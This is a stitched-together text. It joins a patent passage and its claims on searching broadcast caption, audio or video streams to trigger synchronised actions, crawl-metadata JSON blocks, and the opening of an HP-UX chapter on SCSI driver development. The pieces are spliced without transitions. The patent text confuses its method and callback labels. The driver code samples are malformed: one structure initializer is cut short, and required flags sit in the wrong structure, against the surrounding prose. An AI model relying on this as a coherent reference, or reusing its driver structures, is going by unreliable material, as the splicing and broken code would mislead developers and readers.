Turning now to FIGS. 3-4 with continued reference to FIGS. 1-2, the stages for implementing one or more aspects of search program 200 of system 100 are described in further detail. FIG. 3 is a high-level process flow diagram of one aspect of the current invention. In one form, the process of FIG. 3 is at least partially implemented in the...
operating logic of system 100. The process begins at start point 220 with receiving at least one broadcast stream, such as audio, video, emergency alerts, time, weather, and/or data (stage 222). One or more search/action pairs instructions are received from a transmission path, such as one separate from the broadcast stream (stage 224). As a few non-limiting examples, search/action pairs can be contained in an HTML file or other file that was downloaded over an Internet connection. For example, a guide entry for the show can contain a URL that specifies where the initial web page containing the search/action pairs can be retrieved. As another example, the user could select the start page with the search/action pairs by navigating to that page in a web browser or by some other selection means. As yet a further non-limiting example, the initial start page and/or the search/action pairs can be generated programmatically or manually based on criteria entered by the user, such as criteria indicating the user wishes to start recording the show on the programmable video recorder (PVR) when the search string “John Doe” comes on. Finally, the initial start page containing search/action pairs can be retrieved or generated from various other sources.
[0033] The broadcast stream is processed by search program 200 to extract portions of content from the stream (stage 226). As a few non-limiting examples, portions of content extracted from the stream can include string values retrieved from a close caption and/or subtitle stream. Portions of content can alternatively or additionally be extracted from another text stream, an audio stream, or a video stream, from an emergency alert stream, from a time stream, from a weather stream, and/or from other streams. As one non-limiting example, you might want a particular frame or frames of video that you want to match before kicking off a certain action. Numerous other text and non-text variations of searches are also possible.
[0034] When search program 200 determines that the search criteria 216 has been found in the extracted content (stage 228) based on a full or partial match as applicable, the one or more actions 218 associated with the search criteria 216 are initiated and the result of the one or more actions is synchronized with the show being played (stage 230). Some non-limiting examples of actions include initiating another search, opening a particular web page, launching an external program, beginning recording on a PVR device, skipping a scene (such as a commercial) after a certain time period, muting a commercial, tracking the number of times a show is watched for data collection purposes, and/or transcribing the close caption stream and writing the text to file or Braille output. Nearly anything that can be initiated programmatically using computer 110 can be included as part or all of an action. One non-limiting example of synchronization includes using timeshifting to delay playback of the show from its broadcast time and perform the result of the action at a time that appears before the action was actually initiated. The process then ends at end point 232.
[0035] Shown in FIG. 4 is a more detailed process flow diagram illustrating the stages involved in synchronizing content with a show in one aspect of the current invention. In one form, the process of FIG. 4 is at least partially implemented in the operating logic of system 100. The process begins at start point 240 with receiving at least one broadcast stream (stage 242). A search page having one or more search/action pairs is received from a transmission path, such as one separate from the broadcast stream (stage 244). The search page is bound to at least one search object (e.g. search class 260 in FIG. 5) (stage 246). As a non-limiting example, search program 200 can create the search object. Callback methods are registered so methods in the search page for associated actions are called when a match is found (stage 248). The callback method is then called to perform the associated action when a match to the search criteria is found in the broadcast stream (stage 250). The result of the action is then synchronized with the show (stage 252). The process then ends at end point 254.
[0036] Turning now to FIG. 5, a class diagram is shown that illustrates the methods used in synchronizing content with a show in one aspect of the current invention. Search class 260 includes three methods: SetSearch(), SearchFnTemplate(), and ClearSearch(). In one aspect of the invention, the SetSearch method 262 is responsible for initiating the extraction of content from the broadcast stream and searching for a match. In one aspect of the invention, the ClearSearch method 262 is also responsible for registering the callback methods for the associated actions using the SearchFnTemplate method 264 as a template for the structure of the callback method. The ClearSearch method 266 is responsible for deleting the system resources used in running a particular search.
[0037] In one aspect of the invention, the SetSearch method 262 accepts one or more of the following parameters: streamId, searchFn, regExp, mode, idSearch, deltaTimeShift, startTime, endTime, and dwCookie. One or more of these parameters may be optional and/or omitted. The streamId parameter is used to indicate an identifier of the particular stream to search for the search criteria, such as “CC1” or “CC2” for a close caption stream. The searchFn parameter is used to indicate the name of the callback search function to call when the specified criteria has been located/matched in the stream. The regExp parameter is related to the type of the stream. As one non-limiting example, for text based streams, the regExp parameter can be a regular expression or other string that indicates the string to match in the stream. The regExp parameter can include a full or partial string to match, including wildcards or other variations as would occur to one in the art. As another non-limiting example, for video streams, the regExp parameter can be a video image to match. For audio streams, as a non-limiting example, the regExp parameter can be a sound byte to match. For audio and/or video streams, the regExp parameter can include a full and/or partial value to match. Alternatively or additionally, the particular stream could be converted to a string or other data type suitable for matching. The mode parameter indicates how long the search should be performed, such as once, recurring, etc. In one aspect of the invention, if once is specified, the search terminates after the first string it gets that matches. If recurring is specified, then the search keeps on matching strings until terminated manually or systematically.
[0038] The idSearch parameter is an identifier for the search, and may or may not be unique. The deltaTimeShift parameter specifies the delay in presentation time from when the search string is matched and the callback method is kicked off. As one non-limiting example, the deltaTimeShift
parameter can be used in a scenario where the action to perform when a match is found includes initiating the recording of a television show on a PVR after a certain portion of a segment begins to air with someone featured the user wants to record. The startSearchTime parameter specifies the time the search started, and the endSearchTime parameter specifies the time the search ended. One non-limiting example of when the startSearchTime and endSearchTime parameters might be used is to synchronize content in the third quarter of a sports game. The SetSearch method 262 outputs a dwCookie parameter that is a unique identifier for the search that can be used to free system resources with the search, as well as used for other purposes as desired.
In one aspect of the invention, the SearchFnTemplate method 264 serves as the callback template method for the methods of the associated actions that are called when a particular search criteria is matched in the broadcast stream. The SearchFnTemplate method 264 can include one or more of the following input parameters: ccMatched, idSearch, timeStart, and/or timeEnd. One or more of these parameters may be optional and/or omitted. In one aspect of the system, for text-based streams, the ccMatched parameter is the actual string matched in the search. For other stream types, such as audio and/or video streams, the ccMatched parameter is the matched section of that stream. The idSearch parameter is an identifier for the search, and may or may not be unique. The timeStart parameter is the presentation time of the first field (e.g. character) in the search string and the timeEnd parameter is the presentation time of the last field (e.g. character) in the search string. The timeStart and timeEnd parameters may be offset by the deltaTimeShift parameter specified in the SetSearch method 262. As one non-limiting example, the timeStart parameter can be used in external (post-processing) stages to realign stages with the video. As one non-limiting example, the timeEnd parameter can be used as a synchronization point to base further animations from.
The ClearSearch method 266 can include one or more of the following parameters: dwCookie. The dwCookie parameter is a unique identifier for the particular search and allows the ClearSearch method 266 to free the system resources associated with the search.
One of ordinary skill in the software art will appreciate that the methods in search class 260 could be arranged differently with more or fewer parameters, could perform more or fewer operations, and/or could call other methods to perform the operations described. Furthermore, one of ordinary skill in the software art will appreciate that one of more of the methods in search class 260 could be modified so that the return value is not from the particular stream being matched, but instead is from another co-time-located stream and/or a time indicator in the show. As one non-limiting example, when a particular sound occurs in the show (the value being matched), a certain picture could be returned (the value being returned).
Turning now to FIGS. 6-10, some hypothetical examples will be used to further illustrate some of the techniques discussed in FIGS. 1-5. These examples are illustrative only and the techniques described herein could be used in numerous other scenarios. Beginning with FIG. 6, a process flow diagram illustrates performing serial matching based on a “Mary had a little lamb” hypothetical. Serial matching is used when you want to process certain searches in a specific order, and/or perform one or more actions only if all of the search criteria in that exact order are met. An example where serial matching may be useful is when a live show is being broadcast and you are not sure of certain details so you want to wait until after the criteria is matched completely and in a certain exact order. Serial matching does not work as well when part of the content that is required for a match comes across garbled and/or in scenarios where the show is mid-stream and some of the content that includes the search criteria has already been broadcast.
The process on FIG. 6 begins with running the OnLoad 270 event from the search page. The first search is looking for “Mary” 272. The stream is searched until “Mary” 274 is located. When “Mary” is actually located 276, then the search proceeds with searching for “Had” 278. The stream is then searched until “Had” 280 is located. When “Had” is actually located 282, then the search proceeds with searching for “Little”. The process follows this serial pattern for each of the remaining phrases until “Lamb” is actually found 294.
FIG. 7 illustrates a sample HTML page containing VBScript code for implementing the serial matching process described in FIG. 6. As one non-limiting example, this starting page containing the search/action pairs could be downloaded from the Internet. Other scenarios for obtaining the start page could also be used as were discussed previously. A bind method 300 binds the page to a search object (e.g. an instance of search class 260). When the OnLoad event 302 runs, the SetSearch method is called to setup the first search for “Mary”. The SetSearch method is passed the streamId value “CC1” for close caption stream, “ActMary” for the searchFn value to specify the name of the callback function, “Mary” for the regExp string to match value, and “Once” for the mode to specify how many matches to look for. Behind the scenes, the callback function ActMary is registered, and when a match is actually found for “Mary”, the ActMary method 304 is called. The ActHarry method 304 then sets up the next search by calling the SetSearch method with the new criteria. This pattern then repeats by calling the ActHarry method 306, the ActLittle method 308, and the ActLamb method 310 at the appropriate times in serial order when the matches are found. When the ActLamb method 308 is called at the end of the serial process, it performs the desired action and synchronizes the action with the show content, which in this example is to launch a web page showing a “Test Your Little Lamb Knowledge” quiz while the show is airing (see FIG. 10 discussed in a following section).
Turning now to FIGS. 8 and 9, the same hypothetical will be used to illustrate a parallel matching process. A parallel matching process can be useful in scenarios where there are missing strings and/or when starting in a later part of a show after some content has already been broadcast. FIG. 8 illustrates the process flow and FIG. 9 illustrates the corresponding HTML page with VBScript that implements the process. Both figures will be referred to collectively in the following discussion. Again, the start page shown containing the search/action pairs in FIG. 9 could be downloaded over the Internet and/or obtained by some other means. The process begins with binding the web page to a search object (340 on FIG. 9) and then running the OnLoad
event 320 (342 on FIG. 9) that kicks off all of the searches 322. In the OnLoad event 320, five searches are registered using the SetSearch method that can be completed in any order (if at all): Mary 324, Had 326, A Little 328, Lamb 330, and 5 Seconds (timeout) 332. When searches for Mary 324, Had 326, and A Little 328 are matched, then the callback method 334 (344 on FIG. 9) is called. When searches for Lamb 330 and 5 Seconds (timeout) 332 are matched, the Done method 336 (346 on FIG. 9) is called. When the search for Lamb 330 completes with a successful match, the Done method 336 (346 on FIG. 9) clears up the resources by calling the ClearSearch method and then performs the final action, which is to display the “Test Your Little Lamb Knowledge” quiz and synchronize it with the show. As shown on FIG. 10, the simulated screen 350 includes, among other things, a TV window 352, as well as content window 354 for displaying the “Test Your Little Lamb Knowledge” quiz discussed in the hypothetical examples in FIGS. 6-9. One of ordinary skill in the art will appreciate that parallel and serial searches are opposite extremes of searching methods, and that combinations of these two searching methods could be used instead of or in addition to either of them alone.
Although the subject matter has been described in language specific to structural features and/or methodological acts, it is to be understood that the subject matter defined in the appended claims is not necessarily limited to the specific features or acts described above. Rather, the specific features and acts described above are disclosed as example forms of implementing the claims. All equivalents, changes, and modifications that come within the spirit of the inventions as described herein and/or by the following claims are desired to be protected.
For example, a person of ordinary skill in the computer software art will recognize that the client and/or server arrangements, user interface screen content, and/or data layouts as described in the examples discussed herein could be organized differently on one or more computers to include fewer or additional options or features than as portrayed in the examples and still be within the spirit of the invention.
What is claimed is:
1. A method of synchronizing content to television shows, comprising the steps of:
receiving at least one broadcast stream;
receiving a set of search instructions from a transmission path, the set of search instructions comprising at least one search criteria and at least one associated action to be performed;
processing the broadcast stream to extract portions of content;
determining that the at least one search criteria has been found in the extracted portions of content; and
initiating the at least one associated action, including synchronizing the action with a particular show being played.
2. The method of claim 1, wherein the broadcast stream is a captioning stream.
3. The method of claim 1, wherein the broadcast stream is an audio stream.
4. The method of claim 1, wherein the set of search instructions are received in a web page.
5. The method of claim 1, further comprising:
using timeshifting while the particular show is being played to make the action appear to occur before a point in time that the action was actually initiated.
6. The method of claim 1, wherein the search criteria is based at least in part upon a string value.
7. The method of claim 1, wherein the search criteria is based at least in part upon a sound.
8. The method of claim 1, wherein the search criteria is based at least in part upon one or more video frames.
9. The method of claim 1, wherein the step of determining that at least one search criteria has been found does not require an exact match.
10. The method of claim 1 wherein the set of search instructions are received by first receiving a guide entry for the particular show being played and then retrieving the search instructions at a particular URL specified in the guide entry.
11. The method of claim 1, wherein the transmission path is an Internet connection.
12. The method of claim 1, wherein the set of search instructions are specified by a user.
13. A computer-readable medium having computer-executable instructions for causing a computer to perform the steps recited in claim 1.
14. A method of synchronizing content to television shows, comprising the steps of:
receiving at least one broadcast stream;
receiving at least one search page from a transmission path, the search page comprising at least one search criteria and at least one associated action to be performed;
binding the search page to at least one search object;
from the search object, registering at least one search callback method, the callback method being located within the search page, and the callback method being operable to perform the associated action;
calling the callback method to perform the associated action when the search criteria is located in the broadcast stream; and
synchronizing the associated action with a particular show being played.
15. A computer-readable medium having computer-executable instructions for causing a computer to perform the steps recited in claim 14.
16. An application program interface for synchronizing content to television shows, the application program interface embodied on one or more computer readable media, comprising:
a SetSearch method having a plurality of call parameters comprising a search function to call, a value to search for, and a cookie ID, wherein the cookie ID is an output parameter, wherein the SetSearch method is operable to initiate searching of a particular broadcast stream to locate the value to match, wherein the SetSearch
method is further operable to register the search function as a callback method that is called when the value to match is located in the particular stream, and wherein the value to match is determined at least in part by a search instruction that is transmitted from a transmission path;
a SearchFineTemplate method having an actual value matched call parameter, wherein the SearchFineTemplate method is used as a template by the SetSearch method to register the search function as the callback method that performs a particular action based on the actual string matched, the action being related to delivering a desired content to a user in conjunction with a particular portion of a particular show; and
a ClearSearch method having the cookie ID call parameter as an input parameter, the ClearSearch method being operable to delete resources in use that are associated with the cookie ID.
17. The application program interface of claim 16, wherein the SetSearch method further comprises the following call parameter: a stream ID to identify the particular broadcast stream to search for the value to match.
18. The application program interface of claim 16, wherein the SetSearch method further comprises the following call parameter: a delta time shift to specify a delay in presentation time from when the value to match is located and when the search function is called.
19. The application program interface of claim 16, wherein the SetSearch method further comprises the following call parameters: a start search time and an end search time.
20. The application program interface of claim 16, wherein the SearchFineTemplate method further comprises the following call parameters: a start time indicating a starting time of a first field in the value to match, and an end time indicating an ending time of a last field in the value to match.
* * * * *
|
{"Source-Url": "https://patentimages.storage.googleapis.com/02/a9/f8/2a38a862cf0326/US20070130611A1.pdf", "len_cl100k_base": 9815, "olmocr-version": "0.1.50", "pdf-total-pages": 18, "total-fallback-pages": 0, "total-input-tokens": 23524, "total-output-tokens": 11297, "length": "2e13", "weborganizer": {"__label__adult": 0.0006632804870605469, "__label__art_design": 0.002216339111328125, "__label__crime_law": 0.000949382781982422, "__label__education_jobs": 0.0023250579833984375, "__label__entertainment": 0.0034694671630859375, "__label__fashion_beauty": 0.0003256797790527344, "__label__finance_business": 0.0015268325805664062, "__label__food_dining": 0.0004417896270751953, "__label__games": 0.0070343017578125, "__label__hardware": 0.04156494140625, "__label__health": 0.0002105236053466797, "__label__history": 0.0003910064697265625, "__label__home_hobbies": 0.0002684593200683594, "__label__industrial": 0.0007929801940917969, "__label__literature": 0.0006532669067382812, "__label__politics": 0.0004808902740478515, "__label__religion": 0.0006585121154785156, "__label__science_tech": 0.06903076171875, "__label__social_life": 0.00012445449829101562, "__label__software": 0.3486328125, "__label__software_dev": 0.51708984375, "__label__sports_fitness": 0.00031948089599609375, "__label__transportation": 0.0005350112915039062, "__label__travel": 0.0002287626266479492}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47381, 0.04278]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47381, 0.67943]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47381, 0.90234]], "google_gemma-3-12b-it_contains_pii": [[0, 1000, false], [1000, 1000, null], [1000, 1000, null], [1000, 1666, null], [1666, 2311, null], [2311, 2698, null], [2698, 2874, null], [2874, 4245, null], [4245, 4245, null], [4245, 5523, null], [5523, 5615, null], [5615, 11735, null], [11735, 18672, null], [18672, 25685, null], [25685, 32747, null], [32747, 39743, null], [39743, 45517, null], [45517, 47381, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1000, true], [1000, 1000, null], [1000, 1000, null], [1000, 1666, null], [1666, 2311, null], [2311, 2698, null], [2698, 2874, null], [2874, 4245, null], [4245, 4245, null], [4245, 5523, null], [5523, 5615, null], [5615, 11735, null], [11735, 18672, null], [18672, 25685, null], [25685, 32747, null], [32747, 39743, null], [39743, 45517, null], [45517, 47381, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 47381, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47381, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47381, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47381, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47381, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47381, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47381, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47381, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47381, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47381, null]], "pdf_page_numbers": [[0, 1000, 1], [1000, 1000, 2], [1000, 1000, 3], [1000, 1666, 4], [1666, 2311, 5], [2311, 2698, 6], [2698, 2874, 7], [2874, 4245, 8], [4245, 4245, 9], [4245, 5523, 10], [5523, 5615, 11], [5615, 11735, 12], [11735, 18672, 13], [18672, 25685, 14], [25685, 32747, 15], [32747, 39743, 16], [39743, 45517, 17], [45517, 47381, 18]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47381, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-29
|
2024-11-29
|
659aed3c9a398bb041b0bef81275a908a1e962ee
|
[REMOVED]
|
{"Source-Url": "http://www.cs.ucr.edu/~lesani/companion/nfm19/Paper.pdf", "len_cl100k_base": 10488, "olmocr-version": "0.1.50", "pdf-total-pages": 18, "total-fallback-pages": 0, "total-input-tokens": 69498, "total-output-tokens": 13900, "length": "2e13", "weborganizer": {"__label__adult": 0.0003554821014404297, "__label__art_design": 0.0002582073211669922, "__label__crime_law": 0.0003376007080078125, "__label__education_jobs": 0.00035190582275390625, "__label__entertainment": 5.543231964111328e-05, "__label__fashion_beauty": 0.0001533031463623047, "__label__finance_business": 0.00021970272064208984, "__label__food_dining": 0.00034546852111816406, "__label__games": 0.0006566047668457031, "__label__hardware": 0.0011110305786132812, "__label__health": 0.000492095947265625, "__label__history": 0.0002313852310180664, "__label__home_hobbies": 8.779764175415039e-05, "__label__industrial": 0.00043392181396484375, "__label__literature": 0.00024306774139404297, "__label__politics": 0.0002772808074951172, "__label__religion": 0.00047135353088378906, "__label__science_tech": 0.02032470703125, "__label__social_life": 6.568431854248047e-05, "__label__software": 0.00463104248046875, "__label__software_dev": 0.9677734375, "__label__sports_fitness": 0.0003333091735839844, "__label__transportation": 0.0006160736083984375, "__label__travel": 0.0002027750015258789}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 50072, 0.02732]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 50072, 0.57681]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 50072, 0.85601]], "google_gemma-3-12b-it_contains_pii": [[0, 2718, false], [2718, 4971, null], [4971, 8580, null], [8580, 10907, null], [10907, 14233, null], [14233, 17859, null], [17859, 21092, null], [21092, 22944, null], [22944, 26694, null], [26694, 27966, null], [27966, 31230, null], [31230, 35060, null], [35060, 35889, null], [35889, 39258, null], [39258, 42700, null], [42700, 45896, null], [45896, 49120, null], [49120, 50072, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2718, true], [2718, 4971, null], [4971, 8580, null], [8580, 10907, null], [10907, 14233, null], [14233, 17859, null], [17859, 21092, null], [21092, 22944, null], [22944, 26694, null], [26694, 27966, null], [27966, 31230, null], [31230, 35060, null], [35060, 35889, null], [35889, 39258, null], [39258, 42700, null], [42700, 45896, null], [45896, 49120, null], [49120, 50072, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 50072, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 50072, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 50072, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 50072, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 50072, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 50072, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 50072, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 50072, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 50072, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 50072, null]], "pdf_page_numbers": [[0, 2718, 1], [2718, 4971, 2], [4971, 8580, 3], [8580, 10907, 4], [10907, 14233, 5], [14233, 17859, 6], [17859, 21092, 7], [21092, 22944, 8], [22944, 26694, 9], [26694, 27966, 10], [27966, 31230, 11], [31230, 35060, 12], [35060, 35889, 13], [35889, 39258, 14], [39258, 42700, 15], [42700, 45896, 16], [45896, 49120, 17], [49120, 50072, 18]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 50072, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-28
|
2024-11-28
|
83a861c8f551d42e6d254bef3802e3ad904e5c83
|
[REMOVED]
|
{"len_cl100k_base": 16189, "olmocr-version": "0.1.53", "pdf-total-pages": 31, "total-fallback-pages": 0, "total-input-tokens": 72700, "total-output-tokens": 21227, "length": "2e13", "weborganizer": {"__label__adult": 0.0004825592041015625, "__label__art_design": 0.0003533363342285156, "__label__crime_law": 0.00026798248291015625, "__label__education_jobs": 0.0006990432739257812, "__label__entertainment": 7.444620132446289e-05, "__label__fashion_beauty": 0.00017154216766357422, "__label__finance_business": 0.00015985965728759766, "__label__food_dining": 0.0002968311309814453, "__label__games": 0.0007109642028808594, "__label__hardware": 0.0007605552673339844, "__label__health": 0.0003457069396972656, "__label__history": 0.0001685619354248047, "__label__home_hobbies": 8.863210678100586e-05, "__label__industrial": 0.0002593994140625, "__label__literature": 0.0002720355987548828, "__label__politics": 0.00018668174743652344, "__label__religion": 0.0004177093505859375, "__label__science_tech": 0.00504302978515625, "__label__social_life": 9.584426879882812e-05, "__label__software": 0.00437164306640625, "__label__software_dev": 0.98388671875, "__label__sports_fitness": 0.0003094673156738281, "__label__transportation": 0.0004329681396484375, "__label__travel": 0.00019049644470214844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 75739, 0.05763]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 75739, 0.29509]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 75739, 0.82894]], "google_gemma-3-12b-it_contains_pii": [[0, 2016, false], [2016, 4345, null], [4345, 7345, null], [7345, 9824, null], [9824, 11382, null], [11382, 13058, null], [13058, 15861, null], [15861, 18082, null], [18082, 20807, null], [20807, 23000, null], [23000, 25532, null], [25532, 28278, null], [28278, 30681, null], [30681, 33377, null], [33377, 35580, null], [35580, 38353, null], [38353, 40210, null], [40210, 42394, null], [42394, 44649, null], [44649, 47498, null], [47498, 49205, null], [49205, 52133, null], [52133, 53667, null], [53667, 55109, null], [55109, 57680, null], [57680, 60808, null], [60808, 63404, null], [63404, 66908, null], [66908, 71686, null], [71686, 75582, null], [75582, 75739, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2016, true], [2016, 4345, null], [4345, 7345, null], [7345, 9824, null], [9824, 11382, null], [11382, 13058, null], [13058, 15861, null], [15861, 18082, null], [18082, 20807, null], [20807, 23000, null], [23000, 25532, null], [25532, 28278, null], [28278, 30681, null], [30681, 33377, null], [33377, 35580, null], [35580, 38353, null], [38353, 40210, null], [40210, 42394, null], [42394, 44649, null], [44649, 47498, null], [47498, 49205, null], [49205, 52133, null], [52133, 53667, null], [53667, 55109, null], [55109, 57680, null], [57680, 60808, null], [60808, 63404, null], [63404, 66908, null], [66908, 71686, null], [71686, 75582, null], [75582, 75739, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 75739, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 75739, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 75739, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 75739, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 75739, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 75739, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 75739, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 75739, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 75739, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 75739, null]], "pdf_page_numbers": [[0, 2016, 1], [2016, 4345, 2], [4345, 7345, 3], [7345, 9824, 4], [9824, 11382, 5], [11382, 13058, 6], [13058, 15861, 7], [15861, 18082, 8], [18082, 20807, 9], [20807, 23000, 10], [23000, 25532, 11], [25532, 28278, 12], [28278, 30681, 13], [30681, 33377, 14], [33377, 35580, 15], [35580, 38353, 16], [38353, 40210, 17], [40210, 42394, 18], [42394, 44649, 19], [44649, 47498, 20], [47498, 49205, 21], [49205, 52133, 22], [52133, 53667, 23], [53667, 55109, 24], [55109, 57680, 25], [57680, 60808, 26], [60808, 63404, 27], [63404, 66908, 28], [66908, 71686, 29], [71686, 75582, 30], [75582, 75739, 31]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 75739, 0.21552]]}
|
olmocr_science_pdfs
|
2024-12-08
|
2024-12-08
|
aefc5b6587531ede19b212bee2cac80f6366450a
|
9 Writing SCSI Device Drivers
This chapter presents routines and conceptual material specifically for drivers of SCSI devices. Chapter 5, “Writing a Driver,” describes the general configuration and entry-point driver routines, such as `driver_open` and `driver_write`. If you are writing a SCSI driver, you must provide routines from both Chapter 5, “Writing a Driver,” and this chapter.
The HP-UX Driver Development Reference describes the SCSI Services routines.
SCSI devices can be controlled in two ways, both supported by the SCSI Services routines. Kernel drivers, following the `scsi_disk` model, are the traditional method. They are described in this chapter and in `scsi_disk(7)`. However, many SCSI devices do not need a special driver. Instead, user-programs pass ioctl commands to the pass-through driver, `scsi_ctl`. The pass-through driver is described in `scsi_ctl(7)`.
The following sections provide the suggested steps for developing a SCSI driver:
- “SCSI Driver Development, Step 1: Include Header Files”
- “SCSI Driver Development, Step 2: Set Up Structures”
- “SCSI Driver Development, Step 3: Create the driver_install Routine”
- “SCSI Driver Development, Step 4: Create the driver_dev_init() Routine”
- “SCSI Driver Development, Step 5: Analyze Multiprocessor Implications”
- “SCSI Driver Development, Step 6: Create the Entry-Point Routines”
- “SCSI Driver Development, Step 7: Error Handling”
- “SCSI Driver Development, Step 8: Underlying Routines”
The examples in this chapter assume that the name of your driver is `mydriver` and that you are following the routine-naming conventions described in “Step 1: Choosing a Driver Name” on page 76, Chapter 5.
SCSI Driver Development, Step 1: Include Header Files
See reference pages for each kernel call and data structure your driver uses to find out which headers your driver requires.
NOTE
Including header files that your driver does not need increases compile time and the likelihood of encountering portability problems. It is not recommended.
General Header Files
/usr/include/sys/buf.h I/O buf structure, buf.
/usr/include/sys/errno.h Defines errors returned to applications.
/usr/include/sys/file.h Defines open flags
/usr/include/sys/io.h isc table structure.
/usr/include/sys/malloc.h Necessary for acquiring and releasing memory.
/usr/include/sys/wsio.h WSIO context data and macro definitions.
Header Files for SCSI Drivers
/usr/include/sys/scsi.h SCSI-specific data definitions and ioctl commands.
/usr/include/sys/scsi_ctl.h SCSI subsystem data and macro definitions.
Header Files for Device Classes
In addition to the header file created for the specific driver, your driver may need other, device-class-specific files.
/usr/include/sys/diskio.h Data definitions for disk ioctl commands (DIOC_xxx). Includes /usr/include/sys/types.h and
SCSI Driver Development, Step 1: Include Header Files
/usr/include/sys/ioctl.h
/usr/include/sys/floppy.h Data definitions for floppy ioctl commands.
/usr/include/sys/mtio.h Data definitions for magnetic tape ioctl commands.
SCSI Driver Development, Step 2: Set Up Structures
Depending on the characteristics of the driver, you can set it up as a character driver, a block driver, or (as in the case of disk drivers) both.
NOTE
Whether the driver is to operate on an MP platform or not, SCSI Services makes use of the locking facilities, and all drivers using SCSI Services must use the provided data-protection routines. It is essential that you include the C_ALLCLOSES and C_MGR_IS_MP flags in the drv_ops_t structure and the DRV_MP_SAFE flag in the drv_info_t structure. See “SCSI Driver Development, Step 5: Analyze Multiprocessor Implications” for more information.
Determine the driver's name and device class, and put this information in the appropriate structures. (See “Step 3: Defining Installation Structures” on page 80, Chapter 5, for information about these data structures.)
First, declare your driver's routines that can be called by the kernel. These are used in the following structure.
```
int mydriver_open();
int mydriver_close();
int mydriver_strategy();
int mydriver_psize();
int mydriver_read();
int mydriver_write();
int mydriver_ioctl();
```
The drv_ops_t structure specifies the “external” driver routines to the kernel. The C_ALLCLOSES and C_MGR_IS_MP flags are required by SCSI Services. See “The drv_ops_t Structure Type” on page 80, Chapter 5, for further details.
```
static drv_ops_t mydriver_ops =
{
mydriver_open,
mydriver_close,
mydriver_strategy,
NULL,
};
```
The `drv_info_t` structure specifies the driver's name (`mydriver`) and class (`disk`). Flags define the driver type. The `DRV_MP_SAFE` flag is required by SCSI Services. See "The `drv_info_t` Structure Type" on page 83, Chapter 5, for further details.
```c
static drv_info_t mydriver_info =
{
"mydriver",
"disk",
DRV_CHAR | DRV_BLOCK | DRV_SAVE_CONF | DRV_MP_SAFE,
-1,
-1,
NULL,
NULL,
NULL,
NULL,
C_ALLCLOSES | C_MGR_IS_MP
};
```
The `wsio_drv_data_t` structure specifies additional information for the WSIO CDIO. The first field should be `scsi_disk` for SCSI device drivers and `scsi` for SCSI interface drivers. See "The `wsio_drv_data_t` Structure Type" on page 85, Chapter 5, for further details.
```c
static wsio_drv_data_t mydriver_data =
{
"scsi_disk",
T_DEVICE,
DRV_CONVERGED,
NULL,
NULL,
};
```
